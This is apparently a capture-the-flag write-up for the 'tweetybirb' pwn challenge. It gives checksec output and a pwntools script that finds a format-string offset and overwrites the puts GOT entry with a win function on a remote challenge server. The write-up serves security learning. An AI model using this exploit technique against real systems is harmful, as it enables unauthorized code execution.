Tags: pwntools canary format-string pwn
## Challenge
The challenge file is provided base64-encoded; decode it from [Tweety Birb Base64.txt](https://gist.githubusercontent.com/ebubekirtrkr/b65364871463ac3288f00a85a79634a4/raw/6accc617d5b792ddacbd7b8babea2eb8b8b17786/base64.txt).
## Solve
### Checksec for binary
```
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
```
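Since the binary has a format string vulnerability and only `Partial RELRO`, its GOT stays writable, and with no PIE the GOT address is fixed. We can therefore solve it with the pwntools format string tooling by overwriting a GOT entry.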
```py
from pwn import *

context.log_level = "debug"
elf = ELF("./tweetybirb")
context.arch = elf.arch

def exec_fmt(payload):
    # Run a fresh local process per probe so FmtStr can find the offset
    p = elf.process()
    p.clean()
    p.sendline(payload)
    return p.recvline()

autofmt = FmtStr(exec_fmt)
offset = autofmt.offset  # 6

p = remote("143.198.184.186", 5002)
p.clean()
# Overwrite the GOT entry for puts with the address of win
payload = fmtstr_payload(offset, {elf.symbols["got.puts"]: elf.symbols["win"]})
p.sendline(payload)
p.interactive()
print(p.clean())
```